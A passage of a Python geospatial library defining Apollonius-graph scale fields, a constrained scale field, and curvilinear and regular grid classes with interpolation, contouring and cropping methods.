F=np.zeros( 0, np.float64))
else:
super(PyApolloniusField,self).__init__(X=X,F=F)
if self.redundant_factor is not None:
for i in range(F.shape[0]):
self.insert(X[i],F[i])
def insert(self,xy,f):
""" directly insert a point into the Apollonius graph structure
note that this may be used to incrementally construct the graph,
if the caller doesn't care about the accounting related to the
field -
returns False if redundant checks are enabled and the point was
deemed redundant.
"""
if (self.X.shape[0]==0) or (self.redundant_factor is None):
redundant=False
else:
existing=self.interpolate(xy)
redundant=existing*self.redundant_factor < f
if not redundant:
self.X=array_append(self.X,xy)
self.F=array_append(self.F,f)
return True
else:
return False
def value(self,X):
return self.interpolate(X)
def interpolate(self,X):
X=np.asanyarray(X)
newF = np.zeros( X.shape[:-1], np.float64 )
if len(self.F)==0:
newF[...]=np.nan
return newF
# need to compute all pairs of distances:
# self.X ~ [N,2]
# X ~ [L,M,...,2]
# some manual index wrangling to get an outside-join-multiply
idx=(slice(None),) + tuple([None]*(X.ndim-1))
dx=X[None,...,0] - self.X[ idx + (0,)]
dy=X[None,...,1] - self.X[ idx + (1,)]
dist = np.sqrt(dx**2 + dy**2)
f = self.F[idx] + dist*(self.r-1.0)
newF[...] = f.min(axis=0)
return newF
def to_grid(self,*a,**k):
# XYZField implementation is no good to us.
return Field.to_grid(self,*a,**k)
@staticmethod
def read_shps(shp_names,value_field='value',r=1.1,redundant_factor=None):
""" Read points or lines from a list of shapefiles, and construct
an apollonius graph from the combined set of features. Lines will be
downsampled at the scale of the line.
"""
lines=[]
values=[]
for shp_name in shp_names:
print("Reading %s"%shp_name)
layer=wkb2shp.shp2geom(shp_name,fold_to_lower=True)
value_field=value_field.lower()
for i in range(len(layer)):
geo = layer['geom'][i]
scale=layer[value_field][i]
if np.isfinite(scale) and scale>0.0:
lines.append(np.array(geo.coords))
values.append(scale)
return PyApolloniusField.from_polylines(lines,values,
r=r,redundant_factor=redundant_factor)
@staticmethod
def from_polylines(lines,values,r=1.1,redundant_factor=None):
X = []
F = []
edges = []
for coords,value in zip(lines,values):
if len(coords) > 1: # it's a line - upsample
# need to say closed_ring=0 so it doesn't try to interpolate between
# the very last point back to the first
coords = upsample_linearring(coords,value,closed_ring=0)
if all(coords[-1]==coords[0]):
coords = coords[:-1]
# remove duplicates:
mask = np.all(coords[0:-1,:] == coords[1:,:],axis=1)
mask=np.r_[False,mask]
if np.sum(mask)>0:
print("WARNING: removing duplicate points in shapefile")
print(coords[mask])
coords = coords[~mask]
X.append( coords )
F.append( value*np.ones(len(coords)) )
X = np.concatenate( X )
F = np.concatenate( F )
return PyApolloniusField(X=X,F=F,r=r,redundant_factor=redundant_factor)
has_apollonius=False
try:
import CGAL
# And does it have Apollonius graph bindings?
cgal_bindings = None
try:
# from CGAL import Point_2,Site_2
from CGAL.CGAL_Kernel import Point_2# , Site_2
import CGAL.CGAL_Apollonius_Graph_2 as Apollonius_Graph_2
cgal_bindings = 'old'
except ImportError:
pass
if cgal_bindings is None:
# let it propagate out
from CGAL.CGAL_Kernel import Point_2
from CGAL.CGAL_Apollonius_Graph_2 import Apollonius_Graph_2,Site_2
# print "Has new bindings"
cgal_bindings = 'new'
has_apollonius=True
class ApolloniusField(XYZField):
""" Takes a set of vertices and the allowed scale at each, and
extrapolates across the plane based on a uniform telescoping rate
"""
# Trying to optimize some -
# it segfault under the conditions:
# locality on insert
# locality on query
# redundant_factor = 0.9
# quantize=True/False
# But it's okay if redundant factor is None
# These are disabled while debugging the hangs on CGAL 4.2
# with new bindings
# enable using the last insert as a clue for the next insert
locality_on_insert = False # True
# enable using the last query as a clue for the next query
locality_on_query = False # True
quantize=False
def __init__(self,X,F,r=1.1,redundant_factor=None):
"""
redundant_factor: if a point being inserted has a scale which is larger than the redundant_factor
times the existing scale at its location, then don't insert it. So typically it would be something
like 0.95, which says that if the existing scale at X is 100, and this point has a scale of 96, then
we don't insert.
"""
XYZField.__init__(self,X,F)
self.r = r
self.redundant_factor = redundant_factor
self.construct_apollonius_graph()
# Pickle support -
def __getstate__(self):
""" the CGAL.ApolloniusGraph can't be pickled - have to recreate it
"""
d = self.__dict__.copy()
d['ag'] = 'recreate'
d['last_inserted'] = None
d['last_query_vertex'] = None
return d
def __setstate__(self,d):
self.__dict__.update(d)
self.construct_apollonius_graph()
def construct_apollonius_graph(self,quantize=False):
"""
quantize: coordinates will be truncated to integers. Not sure why this is relevant -
might make it faster or more stable?? pretty sure that repeated coordinates will
keep only the tightest constraint
"""
self.quantize = quantize
if len(self.X) > 0:
self.offset = self.X.mean(axis=0)
else:
self.offset = np.zeros(2)
print("Constructing Apollonius Graph. quantize=%s"%quantize)
self.ag = ag = Apollonius_Graph_2()
self.last_inserted = None
# if self.redundant_factor is not None:
self.redundant = np.zeros(len(self.X),bool8)
for i in range(len(self.X)):
if i % 100 == 0:
print(" %8i / %8i"%(i,len(self.X)))
self.redundant[i] = not self.insert(self.X[i],self.F[i])
print("Done!")
def insert(self,xy,f):
""" directly insert a point into the Apollonius graph structure
note that this may be used to incrementally construct the graph,
if the caller doesn't care about the accounting related to the
field -
returns False if redundant checks are enabled and the point was
deemed redundant.
"""
x,y = xy - self.offset
# This had been just -self.F[i], but I think that was wrong.
w = -(f / (self.r-1.0) )
if self.quantize:
x = int(x)
y = int(y)
pnt = Point_2(x,y)
##
if self.redundant_factor is not None:
if self.ag.number_of_vertices() > 0:
existing_scale = self.value_at_point(pnt)
if self.redundant_factor * existing_scale < f:
return False
##
if self.locality_on_insert and self.last_inserted is not None:
# generally the incoming data have some locality - this should speed things
# up.
try:
self.last_inserted = self.ag.insert(Site_2( pnt, w),self.last_inserted)
except Exception: # no direct access to the real type, ArgumentError
print("CGAL doesn't have locality aware bindings. This might be slower")
self.locality_on_insert=False
self.last_inserted = self.ag.insert(Site_2( pnt, w))
else:
s = Site_2(pnt,w)
# print "AG::insert: %f,%f,%f"%(s.point().x(),s.point().y(),s.weight())
#self.last_inserted = self.ag.insert(s)
# try avoiding saving the result
self.ag.insert(s)
# retrieve it to see if it really got inserted like we think
v = self.ag.nearest_neighbor(pnt)
s = v.site()
print(" %f,%f,%f"%(s.point().x(),s.point().y(),s.weight()))
# it seems to crash if queries are allowed to retain this vertex handle -
# probably the insertion can invalidate it
self.last_query_vertex = None
return True
last_query_vertex = None
def value_at_point(self,pnt):
""" Like interpolate, but takes a CGAL point instead. really just for the
skip_redundant option, and called inside interpolate()
"""
if self.ag.number_of_vertices() == 0:
return np.nan
if self.locality_on_query and self.last_query_vertex is not None:
# exploit query locality
try:
v = self.ag.nearest_neighbor(pnt,self.last_query_vertex)
except Exception: # no direct access to the real type, ArgumentError
print("CGAL doesn't have locality aware query bindings. May be slower.")
self.locality_on_query = False
v = self.ag.nearest_neighbor(pnt)
else:
v = self.ag.nearest_neighbor(pnt)
self.last_query_vertex = v
site = v.site()
dist = np.sqrt( (pnt.x() - site.point().x())**2 +
(pnt.y() - site.point().y())**2 )
# before this didn't have the factor dividing site.weight()
f = -( site.weight() * (self.r-1.0) ) + dist*(self.r-1.0)
return f
def interpolate(self,X):
newF = np.zeros( X.shape[0], np.float64 )
for i in range(len(X)):
x,y = X[i] - self.offset
# remember, the slices are y, x
p = Point_2(x,y)
newF[i] = self.value_at_point(p)
return newF
def to_grid(self,nx=2000,ny=2000,interp='apollonius',bounds=None):
if bounds is not None:
if len(bounds) == 2:
extents = [bounds[0],bounds[2],bounds[1],bounds[3]]
else:
extents = bounds
else:
extents = self.bounds()
if interp!='apollonius':
print("NOTICE: Apollonius graph was asked to_grid using '%s'"%interp)
return XYZField.to_grid(self,nx,ny,interp)
else:
x = np.linspace(extents[0],extents[1],nx)
y = np.linspace(extents[2],extents[3],ny)
griddedF = np.zeros( (len(y),len(x)), np.float64 )
for xi in range(len(x)):
for yi in range(len(y)):
griddedF[yi,xi] = self( [x[xi],y[yi]] )
return SimpleGrid(extents,griddedF)
@staticmethod
def read_shps(shp_names,value_field='value',r=1.1,redundant_factor=None):
""" Read points or lines from a list of shapefiles, and construct
an apollonius graph from the combined set of features. Lines will be
downsampled at the scale of the line.
"""
lines=[]
values=[]
for shp_name in shp_names:
print("Reading %s"%shp_name)
ods = ogr.Open(shp_name)
layer = ods.GetLayer(0)
while 1:
feat = layer.GetNextFeature()
if feat is None:
break
geo = wkb.loads(feat.GetGeometryRef().ExportToWkb())
lines.append(np.array(geo.coords))
values.append(feat.GetField(value_field))
return ApolloniusField.from_polylines(lines,values,
r=r,redundant_factor=redundant_factor)
@staticmethod
def from_polylines(lines,values,r=1.1,redundant_factor=None):
X = []
F = []
edges = []
for coords,value in zip(lines,values):
if len(coords) > 1: # it's a line - upsample
# need to say closed_ring=0 so it doesn't try to interpolate between
# the very last point back to the first
coords = upsample_linearring(coords,value,closed_ring=0)
if all(coords[-1]==coords[0]):
coords = coords[:-1]
# remove duplicates:
mask = all(coords[0:-1,:] == coords[1:,:],axis=1)
if sum(mask)>0:
print("WARNING: removing duplicate points in shapefile")
print(coords[mask])
coords = coords[~mask]
X.append( coords )
F.append( value*np.ones(len(coords)) )
X = concatenate( X )
F = concatenate( F )
return ApolloniusField(X=X,F=F,r=r,redundant_factor=redundant_factor)
except ImportError:
#print "CGAL unavailable."
pass
except AttributeError:
# print("You have CGAL, but no Apollonius Graph bindings - auto-telescoping won't work")
pass
if not has_apollonius:
has_apollonius=True
log.debug("Falling back to slow python implementation of ApolloniusField")
ApolloniusField=PyApolloniusField
class ConstrainedScaleField(XYZField):
""" Like XYZField, but when new values are inserted makes sure that
neighboring nodes are not too large. If an inserted scale is too large
it will be made smaller. If a small scale is inserted, it's neighbors
will be checked, and made smaller as necessary. These changes are
propagated to neighbors of neighbors, etc.
As points are inserted, if a neighbor is far enough away, this will
optionally insert new points along the edges connecting with that neighbor
to limit the extent that the new point affects too large an area
"""
r=1.1 # allow 10% growth per segment
def check_all(self):
t = self.tri()
edges = t.edge_db
Ls = np.sqrt( (t.x[edges[:,0]] - t.x[edges[:,1]])**2 +
(t.y[edges[:,0]] - t.y[edges[:,1]])**2 )
dys = self.F[edges[:,0]] - self.F[edges[:,1]]
slopes = abs(dys / Ls)
if any(slopes > self.r-1.0):
bad_edges = where(slopes > self.r-1.0)[0]
print("Bad edges: ")
for e in bad_edges:
a,b = edges[e]
if self.F[a] > self.F[b]:
a,b = b,a
L = np.sqrt( (t.x[a]-t.x[b])**2 + (t.y[a]-t.y[b])**2 )
allowed = self.F[a] + L*(self.r - 1.0)
print("%d:%f --[L=%g]-- %d:%f > %f"%(a,self.F[a],
L,
b,self.F[b],
allowed))
print(" " + str( edges[e] ))
return False
return True
# how much smaller than the 'allowed' value to make nodes
# so if the telescope factor says that the node can be 10m,
# we'll actually update it to be 8.5m
safety_factor = 0.85
def add_point(self,pnt,value,allow_larger=False):
accum = [] # accumulates a list of ( [x,y], scale ) tuples for limiter points
# before adding, see if there is one already in there that's close by
old_value = self(pnt)
if old_value < 0:
print(" count of negative values: ",sum(self.F < 0))
print(" point in question: ",pnt)
print(" old_value",old_value)
fg = self.to_grid(1000,1000)
fg.plot()
global bad
bad = self
raise Exception("Old value at new point is negative!")
if not allow_larger and (value > old_value):
print("Not adding this point, because it is actually larger than existing ones")
return None
## ! Need to be careful about leaning to hard on old_value -
# the nearest neighbors interpolation doesn't guarantee the same value
# as linear interpolation between nodes ( I think ), so it's possible for
# things to look peachy keen from the nn interp but when comparing along edges
# it starts looking worse.
## STATUS
# I think the order of adding intermediate points needs to change.
# maybe we add the starting point, using it's old_value
# then look at its neighbors... confused...
print("-----------Adding point: %s %g=>%g-----------"%(pnt,old_value,value))
j = self.nearest(pnt)
dist = np.sqrt( sum((self.X[j] - pnt)**2) )
if dist < 0.5*value:
i = j
print("add_point redirected, b/c a nearby point already exists.")
# need an extra margin of safety here -
# we're updating a point that is dist away, and we need the scale
# right here to be value.
F_over_there = value - dist*(self.r-1.0)
if F_over_there < self.F[i]:
self.F[i] = self.safety_factor * F_over_there
print(" updating value of %s to %f"%(i,self.F[i]))
self.check_scale(i,old_value = old_value)
else:
i = XYZField.add_point(self,pnt,value)
print(" inserted %d with value %f"%(i,self.F[i]))
# these are the edges in which the new node participates
self.check_scale(i,old_value=old_value)
return i
def check_scale(self,i,old_value=None):
"""
old_value: if specified, on each edge, if the neighbor is far enough away, insert
a new node along the edge at the scale that it would have been if we hadn't
adjusted this node
"""
# print "Check scale of %s"%i
# First, make sure that we are not too large for any neighbors:
t = self.tri()
edges = where( t.edge_db == i )[0]
for e in edges:
a,b = t.edge_db[e]
# enforce that a is the smaller of the two
if self.F[a] > self.F[b]:
a,b = b,a
# this time around, we only care about places where i is the larger
if a==i:
continue
L= np.sqrt( (t.x[a] - t.x[b])**2 + (t.y[a] - t.y[b])**2 )
A = self.F[a]
B = self.F[b]
allowed = A + L*(self.r-1.0)
if B > allowed:
# print "Had to adjust down the requested scale of point"
self.F[b] = self.safety_factor*allowed
# Now we know that the new point is not too large for anyone - see if any of
# it's neighbors are too small.
to_visit = [ (i,old_value) ]
to_add = []
orig_i = i
# used to be important for this to be breadth-first...
# also, this whole thing is hack-ish.
while len(to_visit) > 0:
i,old_value = to_visit.pop(0)
t = self.tri()
edges = where( t.edge_db == i )[0]
for e in edges:
a,b = t.edge_db[e]
# Make b the one that is not i
if b==i:
a,b = b,a
# print "From a=%d visiting b=%d"%(a,b)
# So we are checking on point b, having come from a, but
# ultimately we just care whether b is valid w.r.t orig_i
# print "Checking on edge ",a,b
L = np.sqrt( (t.x[orig_i] - t.x[b])**2 + (t.y[orig_i] - t.y[b])**2 )
La = np.sqrt( (t.x[a] - t.x[b])**2 + (t.y[a] - t.y[b])**2 )
# print " Length is ",L
ORIG = self.F[orig_i]
A = self.F[a] #
B = self.F[b]
# print " Scales A(%d)=%g B(%d)=%g"%(a,A,b,B)
allowed = min( ORIG + L*(self.r-1.0),
A + La*(self.r-1.0) )
# print " Allowed from %d or %d is B: %g"%(orig_i,a,allowed)
if B > allowed:
self.F[b] = self.safety_factor * allowed # play it safe...
# print " Updating B(%d) to allowed scale %f"%(b,self.F[b])
to_visit.append( (b,B) )
# elif (B < 0.8*allowed) and (old_value is not None) and (A<0.8*old_value) and (L > 5*A):
elif (B>A) and (old_value is not None) and (A<0.8*old_value) and (L>5*A):
# the neighbor was significantly smaller than the max allowed,
# so we should limit the influence of this new point.
#
# used to be a safety_factor*allowed here, now just allowed...
alpha = (old_value - A) / (old_value - A + allowed - B)
if alpha < 0.65:
# if the intersection is close to B, don't bother...
new_point = alpha*self.X[b] + (1-alpha)*self.X[a]
# another 0.99 just to be safe against rounding
#
# New approach: use the distance to original point
newL = np.sqrt( (t.x[orig_i] - new_point[0])**2 + (t.y[orig_i] - new_point[1])**2 )
# constrained by valid value based on distance from starting point as well as
# the old value
new_value = min(ORIG + 0.95*newL*(self.r-1.0), # allowed value
0.99*(alpha*B + (1-alpha)*old_value) ) # value along the old line
# print "INTERMEDIATE:"
# print " old_value at A: %g"%old_value
# print " new value at A: %g"%A
# print " curr value at B: %g"%B
# print " allowed at B: %g"%allowed
# print " alpha from A: %g"%alpha
# print " new value for interpolated point: %g"%new_value
#
# print "Will add intermediate point %s = %g"%(new_point,new_value)
to_add.append( (new_point, new_value) )
print("Adding %d intermediate points"%len(to_add))
for p,v in to_add:
if v < 0:
raise Exception("Value of intermediate point is negative")
i = self.add_point(p+0.01*v,v,allow_larger=1)
# print "added intermediate point ",i
def remove_invalid(self):
""" Remove nodes that are too big for their delaunay neighbors
"""
while 1:
t = self.tri()
edges = t.edge_db
Ls = np.sqrt( (t.x[edges[:,0]] - t.x[edges[:,1]])**2 +
(t.y[edges[:,0]] - t.y[edges[:,1]])**2 )
dys = self.F[edges[:,0]] - self.F[edges[:,1]]
slopes = (dys / Ls)
bad0 = slopes > self.r-1.0
bad1 = (-slopes) > self.r-1.0
bad_nodes = union1d( edges[bad0,0], edges[bad1,1] )
if len(bad_nodes) == 0:
break
print("Removing %d of %d"%(len(bad_nodes),len(self.F)))
to_keep = np.ones(len(self.F),bool)
to_keep[bad_nodes] = False
self.F = self.F[to_keep]
self.X = self.X[to_keep]
self._tri = None
self._nn_interper = None
self._lin_interper = None
self.index = None
class XYZText(XYZField):
def __init__(self,fname,sep=None,projection=None):
self.filename = fname
fp = open(fname,'rt')
data = np.array([list(map(float,line.split(sep))) for line in fp])
fp.close()
XYZField.__init__(self,data[:,:2],data[:,2],projection=projection)
## The rest of the density field stuff:
class ConstantField(Field):
def __init__(self,c):
self.c = float(c)
Field.__init__(self)
def value(self,X):
X=np.asanyarray(X)
return self.c * np.ones(X.shape[:-1])
class BinopField(Field):
""" Combine arbitrary fields with binary operators """
def __init__(self,A,op,B):
Field.__init__(self)
self.A = A
self.op = op
self.B = B
def __getstate__(self):
d = self.__dict__.copy()
d['op'] = self.op2str()
return d
def __setstate__(self,d):
self.__dict__.update(d)
self.op = self.str2op(self.op)
# cross your fingers...
def op2str(self):
return self.op.__name__
def str2op(self,s):
return eval(s)
def value(self,X):
try: # if isinstance(self.A,Field):
a = self.A.value(X)
except: # FIX - masks errors!
a = self.A
try: # if isinstance(self.B,Field):
b = self.B.value(X)
except: # FIX - masks errors!
b = self.B
return self.op(a,b)
class Field3D(Field):
pass
class ZLevelField(Field3D):
""" One representation of a 3-D field.
We have a set of XY points and a water column associated with each.
Extrapolation pulls out the closest water column, and extends the lowest
cell if necessary.
"""
def __init__(self,X,Z,F):
Field3D.__init__(self)
self.X = X
self.Z = Z
self.F = ma.masked_invalid(F)
# 2-D index:
self.surf_field = XYZField(self.X,np.arange(len(self.X)))
self.surf_field.build_index()
def shift_z(self,delta_z):
self.Z += delta_z
def distance_along_transect(self):
d = (diff(self.X,axis=0)**2).sum(axis=1)**0.5
d = d.cumsum()
d = concatenate( ([0],d) )
return d
def plot_transect(self):
""" Plots the data in 2-D as if self.X is in order as a transect.
The x axis will be distance between points. NB: if the data are not
organized along a curve, this plot will make no sense!
"""
x = self.distance_along_transect()
meshY,meshX = np.meshgrid(self.Z,x)
all_x = meshX.ravel()
all_y = meshY.ravel()
all_g = transpose(self.F).ravel()
if any(all_g.mask):
valid = ~all_g.mask
all_x = all_x[valid]
all_y = all_y[valid]
all_g = all_g[valid]
scatter(all_x,all_y,60,all_g,linewidth=0)
def plot_surface(self):
scatter(self.X[:,0],self.X[:,1],60,self.F[0,:],linewidth=0)
_cached = None # [(x,y),idxs]
def extrapolate(self,x,y,z):
pnt = np.array([x,y])
if self._cached is not None and (x,y) == self._cached[0]:
idxs = self._cached[1]
else:
# find the horizontal index:
count = 4
idxs = self.surf_field.nearest(pnt,count)
self._cached = [ (x,y), idxs]
zi = searchsorted( self.Z,z)
if zi >= len(self.Z):
zi = len(self.Z) - 1
vals = self.F[zi,idxs]
weights = 1.0 / ( ((pnt - self.X[idxs] )**2).sum(axis=1)+0.0001)
val = (vals*weights).sum() / weights.sum()
return val
# from pysqlite2 import dbapi2 as sqlite
#
# class XYZSpatiaLite(XYZField):
# """ Use spatialite as a backend for storing an xyz field
# """
# def __init__(self,fname,src=None):
# self.conn = sqlite.connect(fname)
# self.conn.enable_load_extension(1)
# self.curs = self.conn.cursor()
# self.curs.execute("select load_extension('/usr/local/lib/libspatialite.so')")
#
# self.ensure_schema()
#
# if src:
# self.load_from_field(src)
#
# schema = """
# create table points (id, geom ..."""
# def ensure_schema(self):
# pass
#
class QuadrilateralGrid(Field):
""" Common code for grids that store data in a matrix
"""
def to_xyz(self):
xyz = self.xyz()
good = ~np.isnan(xyz[:,2])
return XYZField( xyz[good,:2], xyz[good,2], projection = self.projection() )
class CurvilinearGrid(QuadrilateralGrid):
def __init__(self,X,F,projection=None):
""" F: 2D matrix of data values
X: [Frows,Fcols,2] matrix of grid locations [x,y]
Assumes that the grid is reasonable (i.e. doesn't have intersecting lines
between neighbors)
"""
QuadrilateralGrid.__init__(self,projection=projection)
self.X = X
self.F = F
def xyz(self):
""" unravel to a linear sequence of points
"""
xyz = np.zeros( (self.F.shape[0] * self.F.shape[1], 3), np.float64 )
xyz[:,:2] = self.X.ravel()
xyz[:,2] = self.F.ravel()
return xyz
@with_plt
def plot(self,**kwargs):
# this is going to be slow...
self.scatter = plt.scatter( self.X[:,:,0].ravel(),
self.X[:,:,1].ravel(),
c=self.F[:,:].ravel(),
antialiased=False,marker='s',lod=True,
lw=0,**kwargs )
def apply_xform(self,xform):
new_X = self.X.copy()
print("Transforming points")
for row in range(new_X.shape[0]):
print(".")
for col in range(new_X.shape[1]):
new_X[row,col,:] = xform.TransformPoint(*self.X[row,col])[:2]
print("Done transforming points")
# projection should get overwritten by the caller
return CurvilinearGrid(new_X,self.F,projection='reprojected')
def bounds(self):
xmin = self.X[:,:,0].min()
xmax = self.X[:,:,0].max()
ymin = self.X[:,:,1].min()
ymax = self.X[:,:,1].max()
return (xmin,xmax,ymin,ymax)
# cross-grid arithmetic. lots of room for optimization...
def regrid(self,b,interpolation='nearest'):
""" returns an F array corresponding to the field B interpolated
onto our grid
"""
X = self.X.reshape( (-1,2) )
newF = b.interpolate(X,interpolation=interpolation)
return newF.reshape( self.F.shape )
def __sub__(self,b):
if isinstance(b,CurvilinearGrid) and id(b.X) == id(self.X):
print("Reusing this grid.")
Fb = self.F - b.F
else:
Fb = self.regrid( b )
Fb = self.F - Fb
return CurvilinearGrid(X=self.X, F= Fb, projection=self.projection() )
class SimpleGrid(QuadrilateralGrid):
"""
A spatial field stored as a regular cartesian grid.
The spatial extent of the field is stored in self.extents
(as xmin,xmax,ymin,ymax) and the data in the 2D array self.F
"""
int_nan = -9999
# Set to "linear" to have value() calls use linear interpolation
default_interpolation = "linear"
dx=None
dy=None
def __init__(self,extents,F,projection=None,dx=None,dy=None):
""" extents: minx, maxx, miny, maxy
NB: these are node-centered values, so if you're reading in
pixel-based data where the dimensions are given to pixel edges,
be sure to add a half pixel.
"""
self.extents = extents
self.F = F
QuadrilateralGrid.__init__(self,projection=projection)
if dx is not None:
self.dx=dx
if dy is not None:
self.dy=dy
self.delta() # compute those if unspecified
@property
def shape(self):
return self.F.shape
def copy(self):
return SimpleGrid(extents=list(self.extents),F=self.F.copy(),projection=self.projection())
def delta(self):
"""
x and y pixel spacing. If these are not already set (in self.dx, self.dy)
compute from extents and F.
For zero or singleton dimensions the spacing is set to zero.
"""
if self.dx is None:
if self.F.shape[1]>1:
self.dx = (self.extents[1] - self.extents[0]) / (self.F.shape[1]-1.0)
else:
self.dx = 0.0
if self.dy is None:
assert self.F.shape[0]
if self.F.shape[0]>1:
self.dy = (self.extents[3] - self.extents[2]) / (self.F.shape[0]-1.0)
else:
self.dy = 0.0
return self.dx,self.dy
def trace_contour(self,vmin,vmax,union=True,method='mpl',
gdal_contour='gdal_contour'):
"""
Trace a filled contour between vmin and vmax, returning
a single shapely geometry (union=True) or a list of
polygons (union=False).
Uses matplotlib to do the actual contour construction.
Note that matplotlib is not infallible here, and complicated
or large inputs can create erroneous output. gdal_contour
might help.
To use gdal_contour instead, pass method='gdal', and optionally
specify the path to the gdal_contour executable. This currently
behaves differently than the mpl approach. Here vmin is traced,
and vmax is ignored. This should be harmonized at some point. TODO
"""
if method=='mpl':
cset=self.contourf([vmin,vmax],ax='hidden')
segs=cset.allsegs
geoms=[]
for seg in segs[0]:
if len(seg)<3: continue
geoms.append( geometry.Polygon(seg) )
elif method=='gdal':
import tempfile
(fd1,fname_tif)=tempfile.mkstemp(suffix=".tif")
(fd2,fname_shp)=tempfile.mkstemp(suffix=".shp")
os.unlink(fname_shp)
os.close(fd1)
os.close(fd2)
self.write_gdal(fname_tif)
res=subprocess.run([gdal_contour,"-fl",str(vmin),str(vmax),fname_tif,fname_shp],
capture_output=True)
print(res.stdout)
print(res.stderr)
geoms=wkb2shp.shp2geom(fname_shp)['geom']
union=False
if union:
poly=geoms[0]
for geo in geoms[1:]:
poly=poly.union(geo)
return poly
else:
return geoms
@with_plt
def contourf(self,*args,**kwargs):
X,Y = self.XY()
ax=kwargs.pop('ax',None)
if ax=='hidden':
tmp_ax=True
fig=plt.figure(999)
ax=fig.gca()
else:
tmp_ax=False
ax=ax or plt.gca()
cset=ax.contourf(X,Y,self.F,*args,**kwargs)
if tmp_ax:
plt.close(fig)
return cset
@with_plt
def contour(self,*args,**kwargs):
X,Y = self.XY()
ax=kwargs.pop('ax',None) or plt.gca()
return ax.contour(X,Y,self.F,*args,**kwargs)
@with_plt
def plot(self,**kwargs):
F=kwargs.pop('F',self.F)
func=kwargs.pop('func',lambda x:x)
F=func(F)
dx,dy = self.delta()
maskedF = ma.array(self.F,mask=np.isnan(F))
if 'ax' in kwargs:
kwargs = dict(kwargs)
ax = kwargs['ax']
del kwargs['ax']
ims = ax.imshow
else:
ims = plt.imshow
if 'offset' in kwargs:
offset=kwargs.pop('offset')
else:
offset=[0,0]
return ims(maskedF,origin='lower',
extent=[self.extents[0]-0.5*dx + offset[0], self.extents[1]+0.5*dx + offset[0],
self.extents[2]-0.5*dy + offset[1], self.extents[3]+0.5*dy + offset[1]],
**kwargs)
def xy(self):
x = np.linspace(self.extents[0],self.extents[1],self.F.shape[1])
y = np.linspace(self.extents[2],self.extents[3],self.F.shape[0])
return x,y
def XY(self):
X,Y = np.meshgrid(*self.xy())
return X,Y
def xyz(self):
""" unravel to a linear sequence of points
"""
X,Y = self.XY()
xyz = np.zeros( (self.F.shape[0] * self.F.shape[1], 3), np.float64 )
xyz[:,0] = X.ravel()
xyz[:,1] = Y.ravel()
xyz[:,2] = self.F.ravel()
return xyz
def to_xyz(self):
""" The simple grid version is a bit smarter about missing values,
and tries to avoid creating unnecessarily large intermediate arrays
"""
x,y = self.xy()
if hasattr(self.F,'mask') and self.F.mask is not False:
self.F._data[ self.F.mask ] = np.nan
self.F = self.F._data
if self.F.dtype in (np.int16,np.int32):
good = (self.F != self.int_nan)
else:
good = ~np.isnan(self.F)
i,j = where(good)
X = np.zeros( (len(i),2), np.float64 )
X[:,0] = x[j]
X[:,1] = y[i]
return XYZField( X, self.F[good], projection = self.projection() )
def to_curvilinear(self):
X,Y = self.XY()
XY = concatenate( ( X[:,:,None], Y[:,:,None]), axis=2)
cgrid = CurvilinearGrid(XY,self.F)
return cgrid
def apply_xform(self,xform):
# assume that the transform is not a simple scaling in x and y,
# so we have to switch to a curvilinear grid.
cgrid = self.to_curvilinear()
return cgrid.apply_xform(xform)
def xy_to_indexes(self,xy):
dx,dy = self.delta()
row = int( np.round( (xy[1] - self.extents[2]) / dy ) )
col = int( np.round( (xy[0] - self.extents[0]) / dx ) )
return row,col
def rect_to_indexes(self,xxyy):
if len(xxyy)==2:
xxyy=[xxyy[0][0],xxyy[1][0],xxyy[0][1],xxyy[1][1]]
xmin,xmax,ymin,ymax = xxyy
dx,dy = self.delta()
min_col = int( max( np.floor( (xmin - self.extents[0]) / dx ), 0) )
max_col = int( min( np.ceil( (xmax - self.extents[0]) / dx ), self.F.shape[1]-1) )
min_row = int( max( np.floor( (ymin - self.extents[2]) / dy ), 0) )
max_row = int( min( np.ceil( (ymax - self.extents[2]) / dy ), self.F.shape[0]-1) )
return [min_row,max_row,min_col,max_col]
def crop(self,rect=None,indexes=None):
if rect is not None:
indexes=self.rect_to_indexes(rect)
assert indexes is not None,"Must specify one of rect or indexes"
min_row,max_row,min_col,max_col = indexes
newF = self.F[min_row:max_row+1, min_col:max_col+1]
new_extents = [self.extents[0] + min_col*self.dx,
self.extents[0] + max_col*self.dx,
self.extents[2] + min_row*self.dy,
self.extents[2] + max_row*self.dy ]
result=SimpleGrid(extents = new_extents,
F = newF,
projection = self.projection(),
dx=self.dx,dy=self.dy)
return result
def bounds(self):
return np.array(self.extents)
def interpolate(self,X,interpolation=None,fallback=True):
""" interpolation can be nearest or linear
"""
X=np.asanyarray(X)
if interpolation is None:
interpolation = self.default_interpolation
xmin,xmax,ymin,ymax = self.bounds()
dx,dy = self.delta()
if interpolation == 'nearest':
# 0.49 will give us the nearest cell center.
# recently changed X[:,1] to X[...,1] - hopefully will accomodate
# arbitrary shapes for X
rows = (0.49 + (X[...,1] - ymin) / dy).astype(np.int32)
cols = (0.49 + (X[...,0] - xmin) / dx).astype(np.int32)
bad = (rows<0) | (rows>=self.F.shape[0]) | (cols<0) | (cols>=self.F.shape[1])
elif interpolation == 'linear':
# for linear, we choose the floor() of both
row_alpha = ((X[...,1] - ymin) / dy)
col_alpha = ((X[...,0] - xmin) / dx)
rows = row_alpha.astype(np.int32)
cols = col_alpha.astype(np.int32)
row_alpha -= rows # [0,1]
col_alpha -= cols # [0,1]
# and we need one extra on the high end
bad = (rows<0) | (rows>=self.F.shape[0]-1) | (cols<0) | (cols>=self.F.shape[1]-1)
else:
raise Exception("bad interpolation type %s"%interpolation)
if rows.ndim > 0:
rows[bad] = 0
cols[bad] = 0
elif bad:
rows = cols = 0
if interpolation == 'nearest':
result = self.F[rows,cols]
else:
result = self.F[rows,cols] *(1.0-row_alpha)*(1.0-col_alpha) \
+ self.F[rows+1,cols] *row_alpha *(1.0-col_alpha) \
+ self.F[rows,cols+1] *(1.0-row_alpha)*col_alpha \
+ self.F[rows+1,cols+1]*row_alpha *col_alpha
# It may have been an int field, and now we need to go to float and set some nans:
if result.dtype in (int,np.int8,np.int16,np.int32,np.int64):
print("Converting from %s to float"%result.dtype)
result = result.astype(np.float64)
result[ result==self.int_nan ] = np.nan
if result.ndim>0:
result[bad] = np.nan
elif bad:
result = np.nan
# let linear interpolation fall back to nearest at the borders:
if interpolation=='linear' and fallback and np.any(bad):
result[bad] = self.interpolate(X[bad],interpolation='nearest',fallback=False)
return result
def value(self,X):
return self.interpolate(X)
def value_on_edge(self,e,samples=None,**kw):
""" Return the value averaged along an edge - the generic implementation
just takes 5 samples evenly spaced along the line, using value()
"""
if samples is None:
